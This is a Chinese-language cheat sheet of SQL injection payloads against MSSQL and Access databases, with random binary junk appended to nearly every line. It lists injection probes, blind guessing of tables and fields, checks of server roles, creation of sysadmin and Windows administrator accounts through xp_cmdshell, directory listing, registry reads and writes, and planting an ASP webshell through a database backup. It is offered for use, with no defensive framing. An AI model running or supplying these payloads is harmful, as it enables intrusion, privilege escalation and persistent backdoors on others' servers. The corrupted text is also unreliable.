1.判断是否有注入;and 1=1 ;and 1=2 H��1@"�Yg8
2.初步判断是否是mssql ;and user>0 0r@r�Xw��z
<>R7G)w�
F
3.注入参数是字符'and [查询条件] and ''=' kxO$Uk&�TX
�:Rq D0�>1
4.搜索时没过滤参数的'and [查询条件] and '%25'=' *R:nB�)(6<
5|/vc*m_0'
5.判断数据库系统 �m1cy�C�D�
/)G�9w�]|T
;and (select count(*) from sysobjects)>0 mssql 7z$+ *�]9-
v:+se6HY?p
;and (select count(*) from msysobjects)>0 access �6$z�UFIk�
]F_����u�
S� !�e�0�:
q�l���zL<�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 K�[9�<a>D`
���{<i�!Pm
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �}�J��c�^p
CUtk4;^�y#
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 II�2�oV}7?
;�S�%wPXj&
9.(1)猜字段的ascii值(access) :r6
b�w�
>��,y QG+
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 c[Y�C}@l%a
�X��a�k~He
(2)猜字段的ascii值(mssql) $�@<�\$I2s
U�-�Iwda8v
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �D�/)x�e�:
_Ih�~'Y Fd
10.测试权限结构(mssql) \ �pq��]�q
��i.#s'm.9
g_q{3P�W.
HS2)v�d@�)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �EEaF�i��8
|Gs�LcUv6�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- }{� ��P}P}
=�l�\�D7�s
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- +u�H1rF_&@
4A�S�c`w*0
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- t EN���%mK
5n"'�M&Ce
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �oo� qNPLa
�;<*�VwXJR
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �aH~il�!K
�-}>Q0d��)
;and 1=(select IS_MEMBER('db_owner'));-- Z���2ZS5a�
�O��[m+5+
+Y�\#'�KrA
e]5QqM7���
11.添加mssql和系统的帐户 e�5AiI�Vlv
%>�s� y`�c
;exec master.dbo.sp_addlogin username;-- ]02V,'���x
;exec master.dbo.sp_password null,username,password;-- ��.�_n�hW*
}X`K3sk2/z
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- R"tLu/S��n
F!�Uk�`�[L
;exec master.dbo.xp_cmdshell 'net user username password 4�iw�+3 Q|
+�[>m`X�Tq
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 4~�
�iKo��
X-%�*`�XG'
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 6�dNo!$C^
{:"�b�X~<^
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- d�)
> if<o
4��A*'�0!H
��_ '}UNIL
phN��v^R+�
12.(1)遍历目录 J4�JK�Av~3
�Ltu�;s��w
;create table dirs(paths varchar(100), id int) �-PX {W)Aw
EBn7waB��S
;insert dirs exec master.dbo.xp_dirtree 'c:\' =A�,i�9�Z&
_�E�1:3�N|
;and (select top 1 paths from dirs)>0 >Rr]e`3w�G
LsLs����SV
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) eHv/3"Og��
^y??�pp<1J
e06r5%|.%�
�VJPt�/Dy{
(2)遍历目录 wW�H5T�}�\
\_+d*hHF�~
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- X2E����C+<
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 &�<��~`?-c
�vb$k�/8JK
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 {?t=*l\S{w
V�43�|Ej}E
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 {5RM)�J1��
-f'z��_&KI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 1|Fukx<@J<
(l��lg�!1
^c/.D*J�[I
�`�?L���a�
13.mssql中的存储过程 JWEqy+,Fjw
�9�_&.G4%V
xp_regenumvalues 注册表根键, 子键 $cYh X^YG.
:V >Z|?[*H
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Q.!D2RZ�c�
6 �s*#y�[$
xp_regread 根键,子键,键值名 �=�i `o+H�
o��o�/#]�a
;exec xp_regread n}Y�RE`>�D
�r% qgLP{v
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 []'BrG)��!
����>y2gfD
xp_regwrite 根键,子键, 值名, 值类型, 值 O>�}aK.�H�
L��-q.�Q�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 -[G+*�3Y{7
w%`7,d��u|
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Qxt�,@�<IK
`Up�3p�24�
xp_regdeletevalue 根键,子键,值名 $_NVy�>�\&
tL�LP2^_&
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �pWe��KN`
l�].dOso$`
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 O,hT<
s� "
VBy=X\w]��
{wK98�>$a
r��ry �3�3
14.mssql的backup创建webshell `2�}Mz9mk
Gs�xrqIaD
use model �q.~_vS%��
7hQ�rL+%q8
create table cmd(str image); k�WF, *@.B
s:6H^�DQ"C
insert into cmd(str) values (''); ]^E<e!z={$
QY�D���SE
backup database model to disk='c:\l.asp'; �H71LJ��fH
K�oo%mr ��
`cCsJm$�V"
}��c^�`!�9
15.mssql内置函数 R9^Vk*`gFU
RYy_Ppn96f
;and (select @@version)>0 获得Windows的版本号 +A����O�(e
�A�-q�dTJP
;and user_name()='dbo' 判断当前系统的连接用户是不是sa p�m@Mlwg`1
�zc�y�!YB
;and (select user_name())>0 爆当前系统的连接用户 FG�:��(H0�
G-~+F�n�UC
;and (select db_name())>0 得到当前连接的数据库 8-+�Ce�;h�
�]haZ�T\�
�%?^I�S&]Z
X`ee}C.D�_
16.简洁的webshell ��}e�
��s�
� lE�h;�MJ
use model 3* 1c�CM42
j!F5g�P-l�
create table cmd(str image); [}|�x@
�v9
�!Qy%s��Y�
insert into cmd(str) values (''); 2h%�/exeS;
�1pg&?L.MA
backup database model to disk='g:\wwwtest\l.asp';
